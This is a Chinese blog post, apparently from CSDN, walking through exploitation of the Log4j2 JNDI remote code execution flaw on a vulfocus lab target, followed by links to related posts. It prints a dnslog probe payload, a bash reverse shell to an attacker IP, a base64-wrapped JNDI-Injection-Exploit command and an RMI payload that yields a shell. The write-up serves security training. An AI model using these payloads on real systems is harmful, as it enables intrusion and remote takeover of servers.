(2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现

最新推荐文章于 2024-04-29 23:32:51 发布
最新推荐文章于 2024-04-29 23:32:51 发布
阅读量963 收藏 2
点赞数 1
分类专栏: log4j2漏洞复现 漏洞复现 vulfocus 文章标签: log4j 漏洞复现 vulfocus log4j2 vulfocus靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1140037586/article/details/128289050
版权

一、Apache Log4j2是什么?

Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。

二、漏洞大致利用流程:

1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。

2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令。

三、复现过程

1、 先下载需要使用的工具

https://github.com/welk1n/JNDI-Injection-Exploit

访问靶场地址:
在这里插入图片描述

2、使用dnslog进行测试

dnslog地址:http://www.dnslog.cn/
使用如下payload:

${jndi:ldap://2r21sa.dnslog.cn}

将上面的payload使用url编码后,访问目标地址时,在payload=后面加上刚刚转换后的url代码,访问之后查看DNSlog是否有回显,有回显则表示存在漏洞
在这里插入图片描述

在这里插入图片描述

3、使用JNDI工具注入反弹shell

https://github.com/welk1n/JNDI-Injection-Exploit
现在攻击机上启动一个nc监听
在这里插入图片描述
Linux反弹shell指令如下:

bash -i >& /dev/tcp/xxx.24.230.15/6677 0>&1

将上面的反弹shell代码使用base64加密后复制到下面的代码中,后面的-A后面写启动监听的攻击机ip

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC1234eQ1uMjMwL1jE2NS82Njc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A  XXX.24.230.15

攻击机执行上面的命令,执行后如下图:
在这里插入图片描述
将图中标红的地址复制下来,构造如下payload:

${jndi:rmi://XXX.24.230.XXX:1099/xvozci}

将其进行url编码
在这里插入图片描述
复制转换后的url格式payload,粘贴在目标url后面,进行访问,如下图:
在这里插入图片描述
此时发现已经攻击机与受害主机建立了连接
在这里插入图片描述
查看正在监听的nc,发现已经反弹了shell,使用如下命令查看flag,进行提交

ls /tmp

在这里插入图片描述

在这里插入图片描述

夏初春末_昊
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2-rce靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1573
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
vulfocus复现log4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4147
log4j2远程rce漏洞复现
vulfocus复现:Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 876
vulfocus复现:Spring Framework 远程命令执行漏洞
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 778
漏洞是SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3345
vulfocus靶场log4j2漏洞复现
[Vulfocus解题系列] 所复现漏洞总结
热门推荐
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。 已复现Vulfocus靶场漏洞 Struts2-052远程代码执行(CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5553
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7285
log4j漏洞原理和靶场复现
Log4j2远程代码执行漏洞靶场复现(CVE-2021-44228)
没事我溜达
11-02 2109
logger在执行日志的时候,就会执行中间的表达式,如表达式是JNDI就会远程下载文件到本地并执行
log4j漏洞靶场docker-compose.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
【Java基础】Spring核心之控制反转(IOC)
jayxiaoxionger的博客
04-29 895
在Spring框架中,IOC(Inversion of Control,控制反转)是一种设计原则,它是Spring框架的核心概念之一。IOC的基本思想是将程序的控制权从应用程序代码中转移到框架或容器中,从而实现了一种松耦合的设计。在IOC容器中,对象的创建、组装和管理都由容器来负责,而不是由程序员来手动管理对象之间的依赖关系。在Spring中,IOC容器负责管理应用程序中的对象及其之间的关系。通过IOC容器,可以将对象之间的依赖关系通过配置文件或者注解来描述,然后由容器根据这些描述来创建和管理对象。
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
carrot11223的博客
04-29 992
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
Python数组类+AI插件
yajunjiao的专栏
04-29 1346
写代码,然后用AI插件写单元测试和注释。挺好的一种选择,值得体验。
麦肯锡 组织 概述与基本框架gl.ppt
05-05
麦肯锡 组织 概述与基本框架gl.ppt
node-v10.11.0-linux-s390x.tar.xz
最新发布
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,将 Vulhub 项目克隆到本地: ``` $ git clone https://github.com/vulhub/vulhub.git $ cd vulhub ``` 3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` 5. 验证漏洞:容器启动后,你可以使用 curl 或浏览器访问 http://your-ip:8080/,将 "your-ip" 替换为容器所在主机的 IP 地址。如果返回的响应中包含 "Vulnerable" 字样,则表示漏洞存在。 请注意,这只是一个简单的漏洞环境复现示例,用于学习和实验目的。在实际情况中,你需要根据具体的情况和要求来进行漏洞测试和修复工作,并确保遵守法律和道德规范。另外,随着漏洞修复和漏洞利用工具的更新,复现步骤可能会有所变化。建议在复现之前先查阅相关的文档和资料。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值